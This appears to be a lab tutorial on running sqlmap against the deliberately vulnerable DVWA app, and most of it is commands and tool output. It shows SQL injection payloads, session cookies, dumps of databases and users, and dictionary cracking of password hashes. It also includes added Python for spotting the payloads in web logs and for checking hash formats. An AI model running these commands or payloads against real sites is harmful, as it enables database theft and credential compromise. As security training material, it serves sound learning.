sql injection – sqlmap

This article describes how to use SQLMap, an open source penetration testing tool, to automatically detect and exploit SQL injection vulnerabilities and take over a database server. It covers retrieving the database version, database names, table names and column names, and demonstrates how to capture a cookie for SQLMap and enumerate users and passwords.


sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

backtrack 5r1

/pentest/database/sqlmap

To find SQL database version
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url

To Find SQL database Name
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --dbs

To find database table names
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --tables -D database-name

To find database columns
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --columns -T table-name -D database-name

To see the data from database
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --dump --columns -T table-name -D database-name

grab cookie from tamperdata firefox plugin

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u 'http://IP-Address/?id=1&Submit=Submit#' --cookie='PHPSESSID=a93ts3jmfs2ar5asvhh69k6un1; security=low' --string="Surname" --dbs

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 17:05:51

[17:05:52] [INFO] using '/pentest/database/sqlmap/output/IP-Address/session' as session file
[17:05:52] [INFO] resuming injection data from session file
[17:05:52] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[17:05:52] [INFO] testing connection to the target url
[17:05:52] [INFO] testing if the provided string is within the target URL page content
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8761=8761 AND 'FczA'='FczA&Submit=Submit

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 45 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,118,105,58),(SELECT (CASE WHEN (45=45) THEN 1 ELSE 0 END)),CHAR(58,113,98,100,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'COXA'='COXA&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,106,118,105,58),IFNULL(CAST(CHAR(117,73,80,113,73,74,111,75,85,72) AS CHAR),CHAR(32)),CHAR(58,113,98,100,58))# AND 'kmcR'='kmcR&Submit=Submit

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'qxrK'='qxrK&Submit=Submit

[17:05:52] [INFO] manual usage of GET payloads requires url encoding
[17:05:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.3.8
back-end DBMS: MySQL 5.0
[17:05:52] [INFO] fetching database names
[17:05:52] [INFO] read from file '/pentest/database/sqlmap/output/IP-Address/session': information_schema, cdcol, mysql, performance_schema, phpmyadmin, test, webauth
available databases [8]:
[*] cdcol
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth

[17:05:52] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/IP-Address'
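The four payload families sqlmap reported above (boolean-based blind, error-based, UNION query, time-based blind) are just as visible from the web server's side. The following is an added example, not sqlmap's or DVWA's code: it URL-decodes the query string of Apache combined-log lines (the log lines, IP and timestamp are constructed) and flags, per parameter, the patterns those payloads leave behind. The decode step is the point sqlmap's own note "manual usage of GET payloads requires url encoding" makes: in the log the quote is %27 and the space %20, so matching on the raw line would miss them.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Signatures derived from the four injection payload families listed in the
# sqlmap session above. Each is deliberately narrow: a tautology "AND n=n",
# the COUNT(*)/CONCAT/FLOOR(RAND(0)*2) duplicate-key trick of the error-based
# payload, a UNION SELECT, and a SLEEP() call for the time-based one.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),
    "error-based": re.compile(
        r"SELECT\s+COUNT\(\*\)\s*,\s*CONCAT\(.*FLOOR\(RAND\(0\)\*2\)", re.I | re.S),
    "UNION query": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+(\.\d+)?\s*\)", re.I),
}

# Apache combined log: ip ident user [timestamp] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3})')


def decode_params(target):
    """Return the percent-decoded (name, value) pairs of a request target's query string."""
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)


def classify(value):
    """Names of every signature that matches one decoded parameter value."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]


def scan(lines):
    """Scan access-log lines; return one hit per parameter that matched a signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-log line: skip it rather than guess
        for name, value in decode_params(m["target"]):
            kinds = classify(value)
            if kinds:
                hits.append({"ip": m["ip"], "ts": m["ts"], "param": name,
                             "types": kinds, "status": m["status"]})
    return hits


# Constructed sample log lines; the id= values are the payload shapes shown above,
# percent-encoded the way a browser or sqlmap sends them.
_P = '10.0.0.5 - - [12/Mar/2012:17:05:52 +0000] "GET /dvwa/vulnerabilities/sqli/?id='
_S = '&Submit=Submit HTTP/1.1" 200 4812'
SAMPLE_LOG = [
    _P + "1%27%20AND%208761%3D8761%20AND%20%27FczA%27%3D%27FczA" + _S,
    _P + "1%27%20AND%20%28SELECT%2045%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28"
         "CHAR%2858%2C106%2C118%2C105%2C58%29%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM"
         "%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27COXA"
         "%27%3D%27COXA" + _S,
    _P + "1%27%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2858%2C106%2C118%2C105"
         "%2C58%29%29%23" + _S,
    _P + "1%27%20AND%20SLEEP%285%29%20AND%20%27qxrK%27%3D%27qxrK" + _S,
    _P + "2" + _S,  # benign request: the normal DVWA lookup, must not be flagged
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```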

./sqlmap.py -u 'http://IP-Address/?id=1&Submit=Submit#' --cookie='PHPSESSID=a93ts3jmfs2ar5asvhh69k6un1; security=low' --string="Surname" --users --passwords

dojo@dojo-vm:~/tools/sqlmap$ ./sqlmap.py -u 'http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit' --dbs --users --passwords

sqlmap/0.9-dev - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 11:07:20

[11:07:20] [INFO] using '/home/dojo/tools/sqlmap/output/127.0.0.1/session' as session file
[11:07:20] [INFO] resuming string match 'Surname' from session file
you did not provide any string to match. Do you want to use the resumed string to be matched in page when the query is valid? [Y/n]
[11:07:21] [INFO] resuming injection point 'GET' from session file
[11:07:21] [INFO] resuming injection parameter 'id' from session file
[11:07:21] [INFO] resuming injection type 'stringsingle' from session file
[11:07:21] [INFO] resuming 0 number of parenthesis from session file
[11:07:21] [INFO] resuming back-end DBMS 'mysql 5' from session file
[11:07:21] [INFO] testing connection to the target url
sqlmap got a 302 redirect to ../../login.php - What target address do you want to use from now on? http://127.0.0.1:80/dvwa/vulnerabilities/sqli/ (default) or provide another target address based also on the redirection got from the application

>
[11:07:22] [INFO] testing for parenthesis on injectable parameter
[11:07:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[11:07:22] [INFO] fetching database users
[11:07:22] [INFO] fetching number of database users
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 4
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'root'@'localhost'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'root'@'dojo-vm'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'root'@'127.0.0.1'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'

[11:07:22] [INFO] fetching database users password hashes
[11:07:22] [INFO] fetching number of password hashes for user 'root'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 1
[11:07:22] [INFO] fetching password hashes for user 'root'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC
[11:07:22] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 1
[11:07:22] [INFO] fetching password hashes for user 'debian-sys-maint'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': *F50CAE339AF9BCEAD8D81B0D4E743C841415E925
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *F50CAE339AF9BCEAD8D81B0D4E743C841415E925
[*] root [1]:
password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC

[11:07:22] [INFO] fetching database names
[11:07:22] [INFO] fetching number of databases
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 4
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': information_schema
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': dvwa
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': mysql
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

[11:07:22] [INFO] Fetched data logged to text files under '/home/dojo/tools/sqlmap/output/127.0.0.1'

[*] shutting down at: 11:07:22

dojo@dojo-vm:~/tools/sqlmap$

--------------------------------------------------------------
updates
--------------------------------------------------------------
Find database

Used the tamperdata Firefox plugin to get the Cookie as below

Cookie=security=low; _session_id=f4cd3cc878720ceedcc985be580901d4; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3

Reload the login page to get a clean URL: /dvwa/vulnerabilities/sqli/?id=&Submit=Submit#

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" --dbs --users --passwords

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 10:14:04

[10:14:04] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:14:04] [INFO] resuming injection data from session file
[10:14:04] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:14:04] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:14:04] [INFO] manual usage of GET payloads requires url encoding
[10:14:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[10:14:04] [INFO] fetching database users
[10:14:04] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 
'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'

[10:14:05] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[10:14:10] [INFO] using hash method: 'mysql_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[10:14:16] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[10:14:22] [INFO] starting dictionary attack (mysql_passwd)
[10:14:24] [WARNING] no clear password(s) found
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *1457CHANGED263027ECC84AA1457CHANGED26302
[*] root [1]:
password hash: *1457CHANGED263027ECC84AA1457CHANGED26302

[10:14:24] [INFO] fetching database names
[10:14:24] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': information_schema, dvwa, mysql, w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

[10:14:24] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:14:24

--------------------------------------------------------------
Find tables

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" -D dvwa --tables

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 10:27:40

[10:27:40] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:27:40] [INFO] resuming injection data from session file
[10:27:40] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:27:40] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:27:40] [INFO] manual usage of GET payloads requires url encoding
[10:27:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[10:27:40] [INFO] fetching tables for database: dvwa
[10:27:40] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': dvwa, guestbook, dvwa, users
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+

[10:27:40] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:27:40

--------------------------------------------------------------
Find users

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" -D dvwa --users

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 10:28:45

[10:28:45] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:28:45] [INFO] resuming injection data from session file
[10:28:45] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:28:45] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:28:45] [INFO] manual usage of GET payloads requires url encoding
[10:28:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[10:28:45] [INFO] fetching database users
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'

[10:28:45] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:28:45

--------------------------------------------------------------
Find passwords

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" -D dvwa -T users -C password --dump

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 10:24:19

[10:24:20] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:24:20] [INFO] resuming injection data from session file
[10:24:20] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:24:20] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:24:20] [INFO] manual usage of GET payloads requires url encoding
[10:24:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y
[10:24:22] [INFO] fetching columns LIKE 'password' for table 'users' on database 'dvwa'
[10:24:22] [INFO] fetching column(s) 'password' entries for table 'users' on database 'dvwa'
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
[10:24:24] [INFO] using hash method: 'md5_generic_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[10:24:26] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[10:24:28] [INFO] starting dictionary attack (md5_generic_passwd)
[10:24:28] [INFO] found: 'abc123' for hash: 'e99a18c428cb38d5f260853678922e03'
[10:24:29] [INFO] found: 'charley' for hash: '8d3533d75ae2c3966d7e0d4fcc69216b'
[10:24:29] [INFO] found: 'letmein' for hash: '0d107d09f5bbe40cade3de5c71e9e9b7'
[10:24:30] [INFO] found: 'password' for hash: '5f4dcc3b5aa765d61d8327deb882cf99'
Database: dvwa
Table: users
[4 entries]
+---------------------------------------------+
| password |
+---------------------------------------------+
| 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |
| 8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
| e99a18c428cb38d5f260853678922e03 (abc123) |
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------------------------------------------+

[10:24:30] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/10.255.245.136/dump/dvwa/users.csv'
[10:24:30] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:24:30

http://www.myexploit.wordpress.com/web-application-webscarab/

--------------------------------------------------------------

/pentest/web/webscarab

root@bt:/pentest/web/webscarab# java -jar webscarab-one-20110329-1330.jar

root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab1111.tmp/conversations

root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab0087.tmp/conversations --users --passwords --tables --dbs --level=2 --risk=1 --scope=^IP-Address$

[02:35:19] [WARNING] no clear password(s) found
database management system users password hashes:

[*] root [1]:
password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC

Note: you can also look the hash up on an online hash-lookup site.

MySQL 4.1 and later password hashes are SHA1-based:

http://www.md5decrypter.co.uk/sha1-decrypt.aspx

263027ecc84aa7b81ea86b0ebecafe20bc8804fc = dojo
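The two hash formats sqlmap recognised in the runs above ('mysql_passwd' in the --passwords run and 'md5_generic_passwd' in the dvwa.users dump), together with the check its dictionary step performs, as an added example that is not sqlmap's own code: the wordlist is constructed, the MD5 values are the ones from the dump above, and the MySQL 4.1+ hashes are generated locally. It also makes the "SHA1" remark precise: the stored value is SHA1 applied twice, not a plain SHA1 of the password.

```python
import hashlib
import re

# Formats sqlmap labelled above. Both are unsalted, so one candidate can be
# tested against every stored hash at once, which is why a small wordlist
# recovers the dvwa.users passwords in seconds.
MYSQL41_RE = re.compile(r"^\*[0-9A-F]{40}$", re.I)   # mysql_passwd: '*' + hex(SHA1(SHA1(pw)))
MD5_RE = re.compile(r"^[0-9a-f]{32}$", re.I)         # md5_generic_passwd: hex(MD5(pw))


def identify_hash(stored):
    """The step sqlmap logs as 'recognized possible password hash values'."""
    if MYSQL41_RE.match(stored):
        return "mysql_passwd"
    if MD5_RE.match(stored):
        return "md5_generic_passwd"
    return None


def mysql41_hash(password):
    """MySQL >= 4.1 PASSWORD(): '*' followed by uppercase hex of SHA1(SHA1(password)).
    The inner digest is hashed as raw bytes, not as its hex string."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def md5_hash(password):
    """Unsalted MD5, the scheme the dvwa.users table above uses."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


HASHERS = {"mysql_passwd": mysql41_hash, "md5_generic_passwd": md5_hash}


def verify(stored, candidate):
    """True if `candidate` hashes to `stored` under the format `stored` is in."""
    kind = identify_hash(stored)
    if kind is None:
        raise ValueError("unrecognised hash format: %r" % stored)
    return HASHERS[kind](candidate).lower() == stored.lower()


def dictionary_check(stored, wordlist):
    """First wordlist entry that matches `stored`, or None (sqlmap's 'no clear password(s) found')."""
    for word in wordlist:
        if verify(stored, word):
            return word
    return None


def audit(hashes, wordlist):
    """Map every stored hash to the wordlist entry that matches it, or None."""
    return {h: dictionary_check(h, wordlist) for h in hashes}


# Constructed wordlist; DUMPED_MD5 holds the four hashes from the dvwa.users dump above.
WORDLIST = ["123456", "dojo", "qwerty", "letmein", "password", "abc123", "charley"]
DUMPED_MD5 = ["0d107d09f5bbe40cade3de5c71e9e9b7", "8d3533d75ae2c3966d7e0d4fcc69216b",
              "e99a18c428cb38d5f260853678922e03", "5f4dcc3b5aa765d61d8327deb882cf99"]

# Mitigation side: an application table should store a salted, slow hash (bcrypt,
# scrypt or Argon2) rather than MD5, and MySQL accounts should not reuse the
# application's passwords, so a dump of one does not open the other.

if __name__ == "__main__":
    for stored, found in audit(DUMPED_MD5, WORDLIST).items():
        print(stored, "->", found or "(not in wordlist)")
    print(identify_hash("*263027ECC84AA7B81EA86B0EBECAFE20BC8804FC"))  # mysql_passwd
```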

[02:35:19] [INFO] fetching database names
[02:35:19] [INFO] read from file '/pentest/database/sqlmap/output/IP-Address/session': information_schema, dvwa, mysql, w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

[02:35:19] [INFO] fetching tables for databases: w3af_test, dvwa, information_schema, mysql
Database: w3af_test
[2 tables]
+---------------------------------------+
| customers |
| users |
+---------------------------------------+

Database: dvwa
[2 tables]
+---------------------------------------+
| guestbook |
| users |
+---------------------------------------+

[02:35:20] [INFO] fetching columns for table 'users' on database 'dvwa'
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| avatar | varchar(70) |
| first_name | varchar(15) |
| last_name | varchar(15) |
| password | varchar(32) |
| user | varchar(15) |
| user_id | int(6) |
+------------+-------------+

Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables. Moreover you can run your own SQL statements.
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--is-dba Detect if the DBMS current user is DBA
--users Enumerate DBMS users
--passwords Enumerate DBMS users password hashes
--privileges Enumerate DBMS users privileges
--roles Enumerate DBMS users roles
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
--search Search column(s), table(s) and/or database name(s)
